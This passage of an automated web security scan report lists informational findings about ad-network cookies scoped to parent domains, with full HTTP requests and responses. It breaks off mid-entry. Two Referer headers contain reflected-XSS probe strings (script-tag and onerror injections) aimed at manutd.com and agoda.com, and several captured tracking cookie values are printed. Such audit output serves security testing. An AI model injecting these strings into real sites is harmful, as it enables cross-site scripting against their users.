Content-Language: en-US
Content-Length: 239
Date: Sun, 02 Oct 2011 23:50:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=OO-000000000000
...[SNIP]...
13.63. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://rs.gwallet.com/r1/pixel/x1743
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app607
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:49:59 GMT; Path=/
Set-Cookie: cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; Domain=.contextweb.com; Expires=Mon, 01-Oct-2012 23:49:59 GMT; Path=/
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
13.64. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_27838685759&pid=b5bed322-0d4f-f860-f5e9-119078297d65&s=728x90&f=0.2&url=http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D&cid=oxpv1%3A34-632-1929-2300-6511&hrid=2b3668b9fdd43266bb92cfe60a9017d3-1317599506 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1317599506; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27838685759({"r":null});
13.65. http://cas.criteo.com/delivery/admeld_map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/admeld_map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b HTTP/1.1
Host: cas.criteo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; __utma=94712387.960097846.1316386536.1316386536.1316386536.1; __utmz=94712387.1316386536.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/gif
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP='CUR ADM OUR NOR STA NID'
Set-Cookie: extid=4ec87822-8f33-4202-954a-f6f06a37734b; domain=.criteo.com; expires=Mon, 02-Apr-2012 23:49:03 GMT; path=/
Date: Sun, 02 Oct 2011 23:49:02 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
13.66. http://clk.atdmt.com/go/352348532/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/352348532/direct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/352348532/direct;ai.209087168;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.cmegroup.com/advance/
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=eb2a/1c72:ec40/2f33:233cf/1a43a:8bff/7db; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b:c766ac0/7db/15006974/8bff/4e89013e; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close

13.67. http://d.agkn.com/iframe!t=1168!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /iframe!t=1168!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1168!?che=823146&e=x&ent=5797640,69802575,246279115,44069375 HTTP/1.1
Host: d.agkn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 01-Oct-2016 00:09:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 239
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">

</head>

<body style="border: 0; margin:
...[SNIP]...
13.68. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 00:09:11 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:11 GMT

13.69. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/ HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 01:52:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 01:52:55 GMT

GIF89a.............!.......,...........D..;
13.70. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 30-Mar-2012 23:49:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:49:14 GMT

GIF89a.............!.......,...........D..;
13.71. http://d.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=cmcont&ssv_ptnr=pm HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:54 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1295
X-Cnection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<script type="text
...[SNIP]...
13.72. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; FFgeo=5386156; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 01 Jan 2012 00:15:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=1006B826,20|121_977#0;expires=Tue, 02 Oct 2012 00:15:53 GMT;domain=.zedo.com;path=/;
ETag: "3a9d027-de66-4add1b75df1c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=9372
Expires: Mon, 03 Oct 2011 02:52:05 GMT
Date: Mon, 03 Oct 2011 00:15:53 GMT
Connection: close

GIF89a.............!.......,...........D..;


13.73. http://ehg-twi.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%X%@C@C%Xi; CTG=1317474165

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:05 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^XCC; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: CTG=1317599345; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:49:05 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:49:06 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
13.74. http://ehg-twi.hitbox.com/HGct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HGct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HGct?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: WSS_GW=V1z%X%eCer@ir; CTG=1317599837

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:19 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^iXi; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^iXieXr^%rz%zrz%"%X%@Q^^iXiz%X%@Q^^iXi"%X%@Q^^iX^"%X%@Q^^iXieXr^%r"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%QzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:57:19 GMT; max-age=31536000
Set-Cookie: CTG=1317599839; path=/; domain=.hitbox.com; expires=Sun, 09-Oct-2011 23:57:19 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Sun, 02 Oct 2011 23:57:20 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
13.75. http://ff.connextra.com/BlueSquare/selector/client  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ff.connextra.com
Path:   /BlueSquare/selector/client

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BlueSquare/selector/client?client=BlueSquare&placement=Guardian_300x312_Football_Premiership HTTP/1.1
Host: ff.connextra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Served-By: vm-pcxtad05.gs1.betgenius.com
P3P: CP=NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR SAMa BUS IND UNI PUR COM NAV
Location: http://ff.connextra.com/servlet/controller?service=Guardian_300x312_Football_Premiership_v2&client=BlueSquare&placement=Guardian_300x312_Football_Premiership
Content-Length: 0
Expires: Sun, 02 Oct 2011 23:50:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:50:54 GMT
Connection: close
Set-Cookie: FrequencyCappingCookie=; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/BlueSquare
Set-Cookie: BlueSquare=A%7Cpostimpression%7C1%7C201110030050%7C7%7CGuardian_300x312_Football_Premiership%7CGuardian_300x312_Football_Premiership_v2%7C; Domain=.connextra.com; Expires=Mon, 01-Oct-2012 23:50:54 GMT; Path=/

13.76. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/985248306/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM5a299 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.agoda.com/pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM5a299"onerror%3d"alert(1)"d0370ac32b&_=1317602266727
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 03 Oct 2011 00:55:57 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 03-Oct-2011 01:10:57 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;
13.77. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
